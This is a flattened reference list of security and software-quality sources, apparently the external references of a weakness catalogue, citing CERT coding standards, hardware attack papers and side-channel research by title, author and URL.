Hovav Shacham - Analyzing the Crossdomain Policies of Flash Applications - 2011 - --05 - http://cseweb.ucsd.edu/~hovav/dist/crossdomain.pdf - - - Shaun Clowes - A Study in Scarlet - http://www.cgisecurity.com/lib/studyinscarlet.txt - - - Stefan Esser - Suhosin - http://www.hardened-php.net/suhosin/ - - - Johannes Ullrich - Top 25 Series - Rank 13 - PHP File Inclusion - 2010 - --03 - ---11 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/11/top-25-series-rank-13-php-file-inclusion/ - - - Mozilla MDN - Equality comparisons and sameness - https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness - 2017-11-17 - - - Chris McMahon Stone - Tom Chothia - Flavio D. Garcia - Spinner: Semi-Automatic Detection of Pinning without Hostname Verification - http://www.cs.bham.ac.uk/~garciaf/publications/spinner.pdf - 2018-01-16 - - - Wikipedia - Samy (computer worm) - https://en.wikipedia.org/wiki/Samy_(computer_worm) - 2018-01-16 - - - Top 10 2017 - 2017 - --04 - ---12 - OWASP - https://owasp.org/www-pdf-archive/OWASP_Top_10-2017_%28en%29.pdf.pdf - - - Mathias Bynens - About rel=noopener - 2016 - --03 - ---15 - https://mathiasbynens.github.io/rel-noopener/ - - - Object Management Group (OMG) - Automated Source Code Performance Efficiency Measure (ASCPEM) - 2016 - --01 - http://www.omg.org/spec/ASCPEM/1.0 - - - Object Management Group (OMG) - Automated Source Code Maintainability Measure (ASCMM) - 2016 - --01 - http://www.omg.org/spec/ASCMM/1.0 - - - Object Management Group (OMG) - Automated Source Code Reliability Measure (ASCRM) - 2016 - --01 - http://www.omg.org/spec/ASCRM/1.0/ - - - Object Management Group (OMG) - Automated Source Code Security Measure (ASCSM) - 2016 - --01 - http://www.omg.org/spec/ASCSM/1.0/ - - - Robert A. Martin - Lawrence H. Shafer - Providing a Framework for Effective Software Quality Assessment - 1996 - --07 - https://www.researchgate.net/publication/285403022_PROVIDING_A_FRAMEWORK_FOR_EFFECTIVE_SOFTWARE_QUALITY_MEASUREMENT_MAKING_A_SCIENCE_OF_RISK_ASSESSMENT - - - Wikipedia - Cyclomatic Complexity - 2018 - --04 - ---13 - https://en.wikipedia.org/wiki/Cyclomatic_complexity - - - Wikipedia - Halstead complexity measures - 2017 - --11 - ---22 - https://en.wikipedia.org/wiki/Halstead_complexity_measures - - - Pratyusa Manadhata - An Attack Surface Metric - 2008 - --11 - http://reports-archive.adm.cs.cmu.edu/anon/2008/CMU-CS-08-152.pdf - - - Pratyusa Manadhata - Jeannette M. Wing - Measuring a System's Attack Surface - 2004 - http://www.cs.cmu.edu/afs/cs/usr/wing/www/publications/ManadhataWing04.pdf - - - Consortium for Information & Software Quality (CISQ) - Automated Quality Characteristic Measures - 2016 - http://it-cisq.org/standards/automated-quality-characteristic-measures/ - - - Wikipedia - Encapsulation (computer programming) - https://en.wikipedia.org/wiki/Encapsulation_(computer_programming) - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java - https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 04. Characters and Strings (STR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487607 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 17. Java Native Interface (JNI) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487346 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 50. Android (DRD) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487375 - - - Wikipedia - Connection pool - https://en.wikipedia.org/wiki/Connection_pool - - - Bruce Dawson - Comparing Floating Point Numbers, 2012 Edition - 2012 - --02 - ---25 - https://randomascii.wordpress.com/2012/02/25/comparing-floating-point-numbers-2012-edition/ - - - Standard C++ Foundation - Memory Management - https://isocpp.org/wiki/faq/freestore-mgmt#delete-this - - - QuantStart - C++ Virtual Destructors: How to Avoid Memory Leaks - https://www.quantstart.com/articles/C-Virtual-Destructors-How-to-Avoid-Memory-Leaks - - - GeeksforGeeks - Virtual Destructor - https://www.geeksforgeeks.org/virtual-destructor/ - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 01. Preprocessor (PRE) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151965 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 02. Declarations and Initialization (DCL) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151966 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 03. Expressions (EXP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151976 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec. 04. Integers (INT) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151979 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 05. Floating Point (FLP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151969 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 06. Arrays (ARR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151972 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 07. Characters and Strings (STR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151974 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec. 08. Memory Management (MEM) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151930 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 09. Input Output (FIO) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151932 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec. 10. Environment (ENV) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151968 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 11. Signals (SIG) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151975 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 12. Error Handling (ERR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151977 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 13. Application Programming Interfaces (API) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151980 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 14. Concurrency (CON) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151970 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 48. Miscellaneous (MSC) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151973 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 50. POSIX (POS) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151931 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rec 51. Microsoft Windows (WIN) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151933 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 00. Input Validation and Data Sanitization (IDS) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487337 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 01. Declarations and Initialization (DCL) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487329 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 02. Expressions (EXP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487331 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 03. Numeric Types and Operations (NUM) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487335 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 04. Characters and Strings (STR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487333 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 05. Object Orientation (OBJ) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487353 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 06. Methods (MET) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487336 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 07. Exceptional Behavior (ERR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487338 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 13. Input Output (FIO) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487330 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 15. Platform Security (SEC) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487332 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 49. Miscellaneous (MSC) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487351 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rec 18. Concurrency (CON) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487352 - - - Wikipedia - Computational complexity theory) - https://en.wikipedia.org/wiki/Computational_complexity_theory - - - Tim Rains - Microsoft's Free Security Tools - banned.h - 2012 - --08 - ---30 - https://cloudblogs.microsoft.com/microsoftsecure/2012/08/30/microsofts-free-security-tools-banned-h/y - - - Michael Howard - Microsoft's Free Security Tools - banned.h - 2011 - --06 - https://msdn.microsoft.com/en-us/library/bb288454.aspxy - - - The Software Engineering Institute - SEI CERT Perl Coding Standard - https://wiki.sei.cmu.edu/confluence/display/perl/SEI+CERT+Perl+Coding+Standard - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rule 01. Input Validation and Data Sanitization (IDS) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890533 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rule 02. Declarations and Initialization (DCL) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890509 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rule 03. Expressions (EXP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890504 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rule 04. Integers (INT) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890508 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rule 05. Strings (STR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890507 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rule 06. Object-Oriented Programming (OOP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890501 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rule 07. File Input and Output (FIO) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890499 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rule 50. Miscellaneous (MSC) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890497 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rec. 01. Input Validation and Data Sanitization (IDS) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890568 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rec. 02. Declarations and Initialization (DCL) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890569 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rec. 03. Expressions (EXP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890559 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rec. 04. Integers (INT) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890560 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rec. 05. Strings (STR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890563 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rec. 06. Object-Oriented Programming (OOP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890561 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rec. 07. File Input and Output (FIO) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890496 - - - The Software Engineering Institute - SEI CERT Perl Coding Standard : Rule 50. Miscellaneous (MSC) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890502 - - - 2019 CWE Top 25 Most Dangerous Software Errors - 2019 - --09 - ---16 - http://cwe.mitre.org/top25/archive/2019/2019_cwe_top25.html - - - Aleph One - Smashing The Stack For Fun And Profit - 1996 - --11 - ---08 - http://phrack.org/issues/49/14.html - - - Eldar Marcussen - Security issues with using PHP's escapeshellarg - 2013 - --11 - ---13 - https://baesystemsai.blogspot.com/2013/11/security-issues-with-using-phps.html - - - Null pointer / Null dereferencing - 2019 - --07 - ---15 - Wikipedia - https://en.wikipedia.org/wiki/Null_pointer#Null_dereferencing - - - Null Reference Creation and Null Pointer Dereference - Apple - https://developer.apple.com/documentation/code_diagnostics/undefined_behavior_sanitizer/null_reference_creation_and_null_pointer_dereference - - - NULL Pointer Dereference [CWE-476] - 2012 - --09 - ---11 - ImmuniWeb - https://www.immuniweb.com/vulnerability/null-pointer-dereference.html - - - Raoul Strackx - Yves Younan - Pieter Philippaerts - Frank Piessens - Sven Lachmund - Thomas Walter - Breaking the memory secrecy assumption - 2009 - --03 - ---31 - ACM - https://dl.acm.org/citation.cfm?doid=1519144.1519145 - - - Fermin J. Serna - The info leak era on software exploitation - 2012 - --07 - ---25 - https://media.blackhat.com/bh-us-12/Briefings/Serna/BH_US_12_Serna_Leak_Era_Slides.pdf - - - Ali Abbasi and Majid Hashemi - Ghost in the PLC Designing an Undetectable Programmable Logic Controller Rootkit via Pin Control Attack - 2016 - https://www.blackhat.com/docs/eu-16/materials/eu-16-Abbasi-Ghost-In-The-PLC-Designing-An-Undetectable-Programmable-Logic-Controller-Rootkit-wp.pdf - - - Kurt Rosenfeld - Ramesh Karri - Attacks and Defenses for JTAG - 2010 - --02 - https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=5406671 - - - DMA attack - 2019 - --10 - ---19 - https://en.wikipedia.org/wiki/DMA_attack - - - A. Theodore Markettos - Colin Rothwell - Brett F. Gutstein - Allison Pearce - Peter G. Neumann - Simon W. Moore - Robert N. M. Watson - Thunderclap: Exploring Vulnerabilities in Operating System IOMMU Protection via DMA from Untrustworthy Peripherals - 2019 - --02 - ---25 - https://www.ndss-symposium.org/wp-content/uploads/2019/02/ndss2019_05A-1_Markettos_paper.pdf - - - Maximillian Dornseif - Michael Becher - Christian N. Klein - FireWire all your memory are belong to us - 2005 - https://cansecwest.com/core05/2005-firewire-cansecwest.pdf - - - Rory Breuk - Albert Spruyt - Adam Boileau - Integrating DMA attacks in exploitation frameworks - 2012 - --02 - ---20 - https://www.os3.nl/_media/2011-2012/courses/rp1/p14_report.pdf - - - Maximillian Dornseif - Owned by an iPod - 2004 - https://pacsec.jp/psj04/psj04-dornseif-e.ppt - - - Gopal Vishwakarma - Wonjun Lee - Exploiting JTAG and Its Mitigation in IOT: A Survey - 2018 - --12 - ---03 - https://www.mdpi.com/1999-5903/10/12/121/pdf - - - Dmytro Oleksiuk - My aimful life - 2015 - --09 - ---12 - http://blog.cr4.sh/2015/09/breaking-uefi-security-with-software.html - - - PCILeech - 2019 - --10 - ---19 - https://github.com/ufrisk/pcileech - - - A. Theodore Markettos - Adam Boileau - Hit by a Bus:Physical Access Attacks with Firewire - 2006 - https://security-assessment.com/files/presentations/ab_firewire_rux2k6-final.pdf - - - Wikipedia - General Data Protection Regulation - https://en.wikipedia.org/wiki/General_Data_Protection_Regulation - - - State of California Department of Justice, Office of the Attorney General - California Consumer Privacy Act (CCPA) - https://oag.ca.gov/privacy/ccpa - - - Wikipedia - Parasitic computing - https://en.wikipedia.org/wiki/Parasitic_computing - - - WASC - Insecure Indexing - http://projects.webappsec.org/w/page/13246937/Insecure%20Indexing - - - Oracle Java Documentation - https://docs.oracle.com/javase/1.5.0/docs/guide/language/autoboxing.html - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 02. Expressions (EXP) - https://wiki.sei.cmu.edu/confluence/display/java/EXP04-J.+Do+not+pass+arguments+to+certain+Java+Collections+Framework+methods+that+are+a+different+type+than+the+collection+parameter+type - - - NIST - Digital Identity Guidelines (SP 800-63B) - 2017 - --06 - https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf - - - Peter Gutmann - Data Remanence in Semiconductor Devices - 10th USENIX Security Symposium - 2001 - --08 - https://www.usenix.org/legacy/events/sec01/full_papers/gutmann/gutmann.pdf - - - F-Secure Labs - Multiple Vulnerabilities in Barco Clickshare: JTAG access is not permanently disabled - https://labs.f-secure.com/advisories/multiple-vulnerabilities-in-barco-clickshare/ - - - Kurt Rosenfeld - Ramesh Karri - Attacks and Defenses for JTAG - https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=5406671 - - - Moinuddin Qureshi - Michele Franchescini - Vijayalakshmi Srinivasan - Luis Lastras - Bulent Abali - John Karidis - Enhancing Lifetime and Security of PCM-Based Main Memory with Start-Gap Wear Leveling - https://researcher.watson.ibm.com/researcher/files/us-moinqureshi/papers-sgap.pdf - - - Micron - Bad Block Management in NAND Flash Memory - https://www.micron.com/-/media/client/global/documents/products/technical-note/nand-flash/tn2959_bbm_in_nand_flash.pdf - - - Farimah Farahmandi - Prabhat Mishra - FSM Anomaly Detection using Formal Analysis - https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=8119228&tag=1 - - - Keith Bowman - James Tschanz - Chris Wilkerson - Shih-Lien Lu - Tanay Karnik - Vivek De - Shekhar Borkar - Circuit Techniques for Dynamic Variation Tolerance - https://dl.acm.org/doi/10.1145/1629911.1629915 - - - Dan Ernst - Nam Sung Kim - Shidhartha Das - Sanjay Pant - Rajeev Rao - Toan Pham - Conrad Ziesler - David Blaauw - Todd Austin - Krisztian Flautner - Trevor Mudge - Razor: A Low-Power Pipeline Based on Circuit-Level Timing Speculation - https://web.eecs.umich.edu/~taustin/papers/MICRO36-Razor.pdf - - - James Tschanz - Keith Bowman - Steve Walstra - Marty Agostinelli - Tanay Karnik - Vivek De - Tunable Replica Circuits and Adaptive Voltage-Frequency Techniques for Dynamic Voltage, Temperature, and Aging Variation Tolerance - https://ieeexplore.ieee.org/document/5205410 - - - Bilgiday Yuce - Nahid F. Ghalaty - Chinmay Deshpande - Conor Patrick - Leyla Nazhandali - Patrick Schaumont - FAME: Fault-attack Aware Microprocessor Extensions for Hardware Fault Detection and Software Fault Response - https://dl.acm.org/doi/10.1145/2948618.2948626 - - - Keith A. Bowman - James W. Tschanz - Shih-Lien L. Lu - Paolo A. Aseron - Muhammad M. Khellah - Arijit Raychowdhury - Bibiche M. Geuskens - Carlos Tokunaga - Chris B. Wilkerson - Tanay Karnik - Vivek De - A 45 nm Resilient Microprocessor Core for Dynamic Variation Tolerance - https://ieeexplore.ieee.org/document/5654663 - - - Niek Timmers - Albert Spruyt - Bypassing Secure Boot Using Fault Injection - https://www.blackhat.com/docs/eu-16/materials/eu-16-Timmers-Bypassing-Secure-Boot-Using-Fault-Injection.pdf - - - Brian Bailey - Why Chips Die - https://semiengineering.com/why-chips-die/ - - - V. Lakshminarayan - What causes semiconductor devices to fail - https://www.edn.com/what-causes-semiconductor-devices-to-fail/ - - - Tanakorn Leesatapornwongsa - Jeffrey F. Lukman - Shan Lu - Haryadi S. Gunawi - TaxDC: A Taxonomy of Non-Deterministic Concurrency Bugs - in Datacenter Distributed Systems - 2016 - https://ucare.cs.uchicago.edu/pdf/asplos16-TaxDC.pdf - - - Tony Martin - Ghost in the Shell Weakness - 2020 - --02 - ---13 - http://www.friendsglobal.com/ghost-in-the-shell/ghost-in-the-shell-weakness/ - - - Ali Abbasi - Tobias Scharnowski - Thorsten Holz - Doors of Durin: The Veiled Gate to Siemens S7 Silicon - https://i.blackhat.com/eu-19/Wednesday/eu-19-Abbasi-Doors-Of-Durin-The-Veiled-Gate-To-Siemens-S7-Silicon.pdf - - - Sergei Skorobogatov - Christopher Woods - Breakthrough Silicon Scanning Discovers Backdoor in Military Chip - https://www.cl.cam.ac.uk/~sps32/Silicon_scan_draft.pdf - - - Chris Domas - God Mode Unlocked: Hardware Backdoors in x86 CPUs - https://i.blackhat.com/us-18/Thu-August-9/us-18-Domas-God-Mode-Unlocked-Hardware-Backdoors-In-x86-CPUs.pdf - - - Jonathan Brossard - Hardware Backdooring is Practical - https://media.blackhat.com/bh-us-12/Briefings/Brossard/BH_US_12_Brossard_Backdoor_Hacking_Slides.pdf - - - Sergei Skorabogatov - Security, Reliability, and Backdoors - https://www.cl.cam.ac.uk/~sps32/SG_talk_SRB.pdf - - - ARM - Cortex-R4 Manual - https://developer.arm.com/ip-products/processors/cortex-m/cortex-m4 - - - Intel - MCS 51 Microcontroller Family User's Manual - http://web.mit.edu/6.115/www/document/8051.pdf - - - ARM - Memory Protection Unit (MPU) - https://static.docs.arm.com/100699/0100/armv8m_architecture_memory_protection_unit_100699_0100_00_en.pdf - - - Joe Fitzpatrick - SCA4n00bz - Timing-based Sidechannel Attacks for Hardware N00bz workshop - https://github.com/securelyfitz/SCA4n00bz - - - Christopher Tarnovsky - Security Failures in Secure Devices - https://www.blackhat.com/presentations/bh-europe-08/Tarnovsky/Presentation/bh-eu-08-tarnovsky.pdf - - - Kit Murdock - David Oswald - Flavio D Garcia - Jo Van Bulck - Frank Piessens - Daniel Gruss - Plundervolt - https://plundervolt.com/ - - - Adrian Tang - Simha Sethumadhavan - Salvatore Stolfo - CLKSCREW: Exposing the Perils of Security-Oblivious Energy Management - https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-tang.pdf - - - Yoongu Kim - Ross Daly - Jeremie Kim - Ji Hye Lee - Donghyuk Lee - Chris Wilkerson - Konrad Lai - Onur Mutlu - Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors - https://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf - - - Gopal Vishwakarma - Wonjun Lee - JTAG Explained (finally!): Why “IoT”, Software Security Engineers, and Manufacturers Should Care - https://www.mdpi.com/1999-5903/10/12/121/pdf - - - Bob Molyneaux - Mark McDermott - Anil Sabbavarapu - Design for Testability & Design for Debug - http://users.ece.utexas.edu/~mcdermot/vlsi-2/Lecture_17.pdf - - - Fan Wang - Vishwani D. Agrawal - Single Event Upset: An Embedded Tutorial - https://www.eng.auburn.edu/~agrawvd/TALKS/tutorial_6pg.pdf - - - P. D. Bradley - E. Normand - Single Event Upsets in Implantable Cardioverter Defibrillators - https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=736549 - - - Melanie Berg - Kenneth LaBel - Jonathan Pellish - Single Event Effects in FPGA Devices 2015-2016 - https://ntrs.nasa.gov/search.jsp?R=20160007754 - - - Cisco - Cisco 12000 Single Event Upset Failures Overview and Work Around Summary - https://www.cisco.com/c/en/us/support/docs/field-notices/200/fn25994.html - - - Cypress - Different Ways to Mitigate Soft Errors in Asynchronous SRAMs - KBA90939 - https://community.cypress.com/docs/DOC-10826 - - - Ian Johnston - Cosmic particles can change elections and cause plans to fall through the sky, scientists warn - https://www.independent.co.uk/news/science/subatomic-particles-cosmic-rays-computers-change-elections-planes-autopilot-a7584616.html - - - Shahed E. Quadir - Junlin Chen - Domenic Forte - Navid Asadizanjani - Sina Shahbazmohamadi - Lei Wang - John Chandy - Mark Tehranipoor - A Survey on Chip to System Reverse Engineering - https://dl.acm.org/doi/pdf/10.1145/2755563 - - - Brandon Hill - Huge Intel CPU Bug Allegedly Causes Kernel Memory Vulnerability With Up To 30% Performance Hit In Windows And Linux - 2018 - --01 - ---02 - https://hothardware.com/news/intel-cpu-bug-kernel-memory-isolation-linux-windows-macos - - - Christopher Domas - Breaking the x86 ISA - https://github.com/xoreaxeaxeax/sandsifter/blob/master/references/domas_breaking_the_x86_isa_wp.pdf - - - Matthew Hughes - Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed - 2019 - --12 - ---11 - https://www.theregister.com/2019/12/11/f_secure_keywe/ - - - Alex Scroxton - Alarm bells ring, the IoT is listening - https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening - - - Brian Krebs - Zyxel Flaw Powers New Mirai IoT Botnet Strain - 2020 - --03 - ---20 - https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/ - - - Jack Tang - Root Cause Analysis of CVE-2014-1772 – An Internet Explorer Use After Free Vulnerability - 2014 - --11 - ---05 - https://blog.trendmicro.com/trendlabs-security-intelligence/root-cause-analysis-of-cve-2014-1772-an-internet-explorer-use-after-free-vulnerability/ - - - Simon Zuckerbraun - It’s Time To Terminate The Terminator - 2018 - --05 - ---15 - https://www.zerodayinitiative.com/blog/2018/5/15/its-time-to-terminate-the-terminator - - - Christopher Domas - The Memory Sinkhole - 2015 - --07 - ---20 - https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf - - - Anders B. Wilhelmsen - Eivind S. Kristiansen - Marie Moe - The Hard-coded Key to my Heart - Hacking a Pacemaker Programmer - 2019 - --08 - ---10 - https://anderbw.github.io/2019-08-10-DC27-Biohacking-pacemaker-programmer.pdf - - - Chetan Conikee - Case Files from 20 Years of Business Logic Flaws - 2020 - --02 - https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18217/2020_USA20_DSO-R02_01_Case%20Files%20from%2020%20Years%20of%20Business%20Logic%20Flaws.pdf - - - Lucian Armasu - Intel ME's Undocumented Manufacturing Mode Suggests CPU Hacking Risks - 2018 - --10 - ---03 - https://www.tomshardware.com/news/intel-me-cpu-undocumented-manufacturing-mode,37883.html - - - M. West - M. Goodwin - SameSite attribute specification draft - 2016 - --04 - ---06 - https://tools.ietf.org/html/draft-west-first-party-cookies-07 - - - Mozilla - SameSite attribute description on MDN Web Docs - 2020 - --06 - ---20 - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite - - - The Chromium Projects - Chromium support for SameSite attribute - 2019 - --09 - ---26 - https://www.chromium.org/updates/same-site - - - Intel Corporation - PCIe Device Measurement Requirements - 2018 - --09 - https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/pcie-device-security-enhancements.pdf - - - Intel Corporation - Deep Dive: Retpoline: A Branch Target Injection Mitigation - https://software.intel.com/security-software-guidance/insights/deep-dive-retpoline-branch-target-injection-mitigation - - - LANGSEC: Language-theoretic Security - http://langsec.org/ - - - LangSec: Recognition, Validation, and Compositional Correctness for Real World Security - http://langsec.org/bof-handout.pdf - - - Sergey Bratus - Lars Hermerschmidt - Sven M. Hallberg - Michael E. Locasto - Falcon D. Momot - Meredith L. Patterson - Anna Shubina - Curing the Vulnerable Parser: Design Patterns for Secure Input Handling - USENIX ;login: - 2017 - https://www.usenix.org/system/files/login/articles/login_spring17_08_bratus.pdf - - - Android Security Bulletin—December 2018 - https://source.android.com/security/bulletin/2018-12-01.html - - - Muhammad Yasin - Abhrajit Sengupta - Mohammed Thari Nabeel - Mohammed Ashraf - Jeyavijayan (JV) Rajendran - Ozgur Sinanoglu - Provably-Secure Logic Locking: From Theory To Practice - https://dl.acm.org/doi/10.1145/3133956.3133985 - - - Muhammad Yasin - Jeyavijayan (JV) Rajendran - Ozgur Sinanoglu - Trustworthy Hardware Design: Combinational Logic Locking Techniques - https://link.springer.com/book/10.1007/978-3-030-15334-2 - - - Meher Krishna Patel - FPGA designs with Verilog (section 7.4 Glitches) - https://verilogguide.readthedocs.io/en/latest/verilog/fsm.html - - - Clifford E. Cummings - Non-Blocking Assignments in Verilog Synthesis, Coding Styles that Kill! - 2000 - http://www.sunburst-design.com/papers/CummingsSNUG2000SJ_NBA.pdf - - - Paul Kocher - Joshua Jaffe - Benjamin Jun - Introduction to differential power analysis and related attacks - 1998 - https://www.rambus.com/wp-content/uploads/2015/08/DPATechInfo.pdf - - - Dakshi Agrawal - Bruce Archambeault - Josyula R. Rao - Pankaj Rohatgi - The EM Side-Channel(s) - 2007 - --08 - ---24 - https://link.springer.com/content/pdf/10.1007%2F3-540-36400-5_4.pdf - - - Daniel Genkin - Adi Shamir - Eran Tromer - RSA key extraction via low-bandwidth acoustic cryptanalysis - 2014 - --06 - ---13 - https://www.iacr.org/archive/crypto2014/86160149/86160149.pdf - - - Colin O’Flynn - Power Analysis for Cheapskates - 2013 - --01 - ---24 - https://media.blackhat.com/eu-13/briefings/OFlynn/bh-eu-13-for-cheapstakes-oflynn-wp.pdf - - - Moritz Lipp - Michael Schwarz - Daniel Gruss - Thomas Prescher - Werner Haas - Anders Fogh - Jann Horn - Stegfan Mangard - Paul Kocher - Daniel Genkin - Yuval Yarom - Mike Hamberg - Meltdown: Reading Kernel Memory from User Space - 2018 - --01 - ---03 - https://meltdownattack.com/meltdown.pdf - - - Moritz Lipp - Michael Schwarz - Daniel Gruss - Thomas Prescher - Werner Haas - Anders Fogh - Jann Horn - Stegfan Mangard - Paul Kocher - Daniel Genkin - Yuval Yarom - Mike Hamberg - Spectre Attacks: Exploiting Speculative Execution - 2018 - --01 - ---03 - https://spectreattack.com/spectre.pdf - - - Dmitry Evtyushkin - Dmitry Ponomarev - Nael Abu-Ghazaleh - Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR - 2016 - --10 - ---19 - https://ieeexplore.ieee.org/abstract/document/7783743/ - - - Qian Ge - Yuval Yarom - David Cock - Gernot Heiser - A Survey of Microarchitectural Timing 